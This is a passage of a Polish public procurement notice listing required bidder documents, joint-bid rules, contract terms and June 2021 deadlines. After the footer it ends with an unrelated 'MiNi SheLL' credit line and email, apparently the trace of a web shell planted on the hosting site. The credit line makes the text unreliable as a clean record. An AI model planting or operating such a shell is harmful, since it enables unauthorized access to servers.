dokumentem zawierającym<br/>odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego<br/>reprezentacji, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo<br/>organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce<br/>zamieszkania Wykonawcy.<br/>7. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i<br/>aktualność.<br/>8. W zakresie nieuregulowanym ustawą PZP lub niniejszą SWZ do oświadczeń i dokumentów<br/>składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy<br/>rozporządzenia Ministra Rozwoju i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych<br/>środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od<br/>Wykonawcy oraz rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie<br/>sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego lub konkursie</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.Do oferty Wyk.zobowiązany jest dołączyć aktualne na dzień składania ofert ośw.o spełnianiu<br/>war.udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania–zgodnie z Zał.nr<br/>3doSWZ.<br/>2.Inf.zawarte w ośw.,o którym mowa wyżej stanowią wstępne potwierdzenie,że Wykonawca nie<br/>podlega wykluczeniu oraz spełnia warunki udziału w post.<br/>3.Zam.wzywa Wyk.,którego oferta została najwyżej oceniona,do złożenia w wyznaczonym terminie,nie<br/>krótszym niż5 dni od dnia wezw,podmiot.śr.dow.–tj.aktualnych na dzień złożenia następujących<br/>ośw.lub dok.:<br/>1)ośw.Wyk.w zakresie art.108 ust.1 pkt 5 PZP o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów(Dz.U.z2021r.,poz.275z późn.zm.)z innym Wyk.,który złożył odrębną ofertę,ofertę<br/>częściową lub wniosek o dopuszczenie do udziału w postęp.,albo ośw.o przynależ.do tej samej grupy<br/>kapit.wraz z dok.lub inf.potwierdzającymi przygotowanie ofert,oferty częśc.lub wniosku o dop.do<br/>udziału w postęp.niezależnie od innego Wyk.należącego do tej samej grupy kapit.–Zał.nr4 doSWZ,<br/>2)odpis lub inf.z KRS lub z CEIDG,w zakresie art.109ust.1 pkt4PZP,sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem,jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>3)wykaz usług wykonanych nie wcześniej niż w okresie ostatnich5lat,a jeżeli okres prowadzenia<br/>działalności jest krótszy–w tym okresie,porównywalnych z usługami stanowiącymi przedmiot<br/>zamówienia, wraz z podaniem ich rodzaju, wartości,daty,miejsca wykonania i podmiotów,na rzecz<br/>których usługi te zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały<br/>wykonane należycie, przy czym dowodami, o których mowa,są ref.bądź inne dok.sporządzone przez<br/>podmiot,na rzecz którego usługi były wykonywane,a jeżeli z uzasadnionej przyczyny o obiektywnym<br/>charakterze Wyk.onawca nie jest w stanie uzyskać tych dokumentów–inne odpowiednie dok.–<br/>Zał.nr6doSWZ.4.W przypadku,gdy Wyk.w celu potwierdzenia speł.war.udziału w post.,powołuje się na<br/>podmiot,o którym mowa w art118ust.1ustawy,musi wykazać, że wobec tego podmiotu nie zachodzą<br/>przesłanki wykluczenia, o których mowa w rozdziale VII niniejszej SWZ.5.Jeżeli Wykonawca ma<br/>siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,zamiast dokumentu, o<br/>którym mowa w ust.3pkt2powyżej,składa dokument lub dokumenty wystawione w kraju,w którym<br/>Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio,że nie otwarto jego<br/>likwidacji ani nie ogłoszono upadłości.Dokument,o którym mowa powyżej,powinien być wystawiony nie<br/>wcześniej niż3miesiące przed upływem terminu składania ofert.<br/>6.Jeżeli w kraju,w którym Wyk.ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o<br/>których mowa w ust. 3 pkt 2, zastępuje się je w całości lub części dokumentem zawierającym<br/>odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego<br/>reprezentacji, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo<br/>organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce<br/>zamieszkania Wykonawcy.<br/>7. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i<br/>aktualność.<br/>8. W zakresie nieuregulowanym ustawą PZP lub niniejszą SWZ do oświadczeń i dokumentów<br/>składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy<br/>rozporządzenia Ministra Rozwoju i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych<br/>środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od<br/>Wykonawcy oraz rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawiesposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego lub konkursie</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1) oświadczenie Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2021 r., poz. 275 z późn. zm.) z innym Wykonawcą, który złożył odrębną<br/>ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie ofert, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej<br/>samej grupy kapitałowej – Załącznik nr 4 do SWZ,<br/>2) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 PZP, sporządzonych nie wcześniej<br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji,<br/>3) wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, porównywalnych z usługami stanowiącymi<br/>przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i<br/>podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów<br/>określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa,<br/>są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi były<br/>wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest<br/>w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – Załącznik nr 6 do SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1) oświadczenie Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2021 r., poz. 275 z późn. zm.) z innym Wykonawcą, który złożył odrębną<br/>ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie ofert, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej<br/>samej grupy kapitałowej – Załącznik nr 4 do SWZ,<br/>2) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 PZP, sporządzonych nie wcześniej<br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji,<br/>3) wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, porównywalnych z usługami stanowiącymi<br/>przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i<br/>podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów<br/>określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa,<br/>są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi były<br/>wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest<br/>w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – Załącznik nr 6 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o którym mowa w rozdziale VIII ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. <br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-16 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-16 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-08 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com